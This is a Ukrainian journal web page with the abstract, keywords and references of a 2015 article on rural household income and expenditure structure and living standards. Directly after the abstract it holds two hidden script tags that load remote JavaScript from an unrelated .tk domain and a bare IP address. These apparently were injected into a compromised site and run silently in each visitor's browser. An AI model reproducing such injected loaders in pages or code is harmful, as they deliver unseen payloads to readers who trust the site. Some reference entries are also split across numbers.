ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.115: 316. 334.55: 330. 564.2
Сторінка молодого науковця

Вплив структури доходів і витрат домогосподарств на рівень життя сільського населення / Голій Н. П. // Економіка АПК. - 2015. - № 6 - С. 115

Розглянуто основні джерела формування та напрями використання одержуваних доходів сільського населення України, які безпосередньо впливають на формування структури сукупних витрат сільських домогосподарств. Проаналізовано позитивні й негативні зміни в структурі доходів і витрат домогосподарств. Вивчено вплив структури доходів та витрат домогосподарств на якість і рівень життя сільського населення. Визначено напрями підвищення споживчих можливостей селян на основі зростання їхніх доходів. Наведено пріоритетні напрями першочергового спрямування можливих додаткових коштів сільськими домогосподарствами Запропоновано основні заходи створення необхідних організаційно-економічних умов для підвищення рівня доходів та поліпшення якості життя сільського населення України. Табл.: 3. Рис.: 4. Бібліогр.: 18.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: сільське домогосподарство, сукупні ресурси, грошові доходи, сукупні витрати, динаміка споживання, самооцінка рівня доходів

Список використаних джерел

 1. Витрати і доходи домогосподарств України у 2000 р.: стат. збірник / Державна служба статистики Украї-ни. – К., 2001. // [Електронний ресурс]. – Режим доступу : www.ukrstat.gov.ua.
 2. Витрати і ресурси домогосподарств України у 2010 р.: стат. збірник. Ч. І / Державна служба статистики України. – К., 2011. // [Електронний ресурс]. – Режим доступу : www.ukrstat.gov.ua.
 3. Витрати і ресурси домогосподарств України у 2011 р.: стат. збірник. Ч. І / Державна служба статистики України. – К., 2012. // [Електронний ресурс]. – Режим доступу : www.ukrstat.gov.ua.
 4. Витрати і ресурси домогосподарств України у 2012 р: стат. збірник. Ч. І / Державна служба статистики України. – К., 2013. // [Електронний ресурс]. – Режим доступу : www.ukrstat.gov.ua.
 5. Витрати і ресурси домогосподарств України у 2013 р: стат. збірник. Ч. І / Державна служба статистики України. – К., 2014. – // [Електронний ресурс]. – Режим доступу : www.ukrstat.gov.ua.
 6. Дієсперов В. С. Зайнятість населення в сільському районі / В. С. Дієсперов // Україна : аспекти праці. – 2013. – № 4. – С. 3 – 9.
 7. Матеріальний добробут сільських жителів; за ред. П.Т. Саблука, М.К. Орлатого. – К. : ІАЕ УААН, 2002. – 370 с.
 8. Махсма М. Доходи і витрати сільського населення України / М. Махсма // Україна : аспекти праці. – 2012. –
 9. № 7. – С. 3 – 13.
 10. Програма розвитку особистих селянських господарств в Україні на період до 2020 року (проект); за ред.
 11. Ю. О. Лупенка, М. Й. Маліка. – К. : ННЦ ІАЕ, 2013. – 28 с.
 12. Прокопа І.В. Формалізація зайнятості в особистих селянських господарствах як засіб подолання соціального відторгнення селян / І. В. Прокопа // Економіка праці та проблеми зайнятості. – 2013. – № 3. – С. 10 – 14.
 13. Самооцінка домогосподарствами України рівня своїх доходів у 2013 році: аналітична доповідь // [Елект-ронний ресурс]. – Режим доступу : www.ukrstat.gov.ua.
 14. Стратегічні напрями сталого розвитку сільських територій на період до 2020 року / [ Ю.О. Лупенко,
 15. М.Й. Малік, О.Г. Булавка та ін.] ; за ред. Ю. О. Лупенка та О.Г. Булавки. – К. : ННЦ ІАЕ, 2013. – 74 с.
 16. Якуба К.І. Життєвий і трудовий потенціал сільського населення України. Теорія, методологія, практика /
 17. К. І. Якуба. – К. : ННЦ ІАЕ, 2007. – 362 с.
 18. The EU Rural Development Policy : Facing the Challenges // [Electronic resource]. – European Commission – Directorate-General for Agriculture and Rural Development, 2008. – 24 p. Available on : http://ec.europa.eu/agriculture/rurdev/index_en.htm.
 19. Rural Development in the European Union : Statistical and Economic Information : Report 2008. – European Commission, 2008. – 378 p.
 20. Dijkstra L. Remote Rural Regions. How proximity to a city influences the performance of rural regions / L. Dijkstra, H. Poelman // A series of short papers on regional research and indicators produced by the Directorate-General for Regional Policy. – 2008. – № 1. – 7 р.
 21. Johnson, David, Jonathan Parker and Nicholas Souleles. 2006. “Household Expenditure and the Income Tax Rebates of 2001.” American Economic Review96(5), 1589-1610. Mariger, Randall and Kathryn.
 22. Brewer, Mike; Goodman, Alissa; Leicester, Andrew (2006), "Household spending in Britain. What can it teach us about poverty?" London, Institute for Fiscal Studies.

Читати статтю: 15_06_115-123.pdf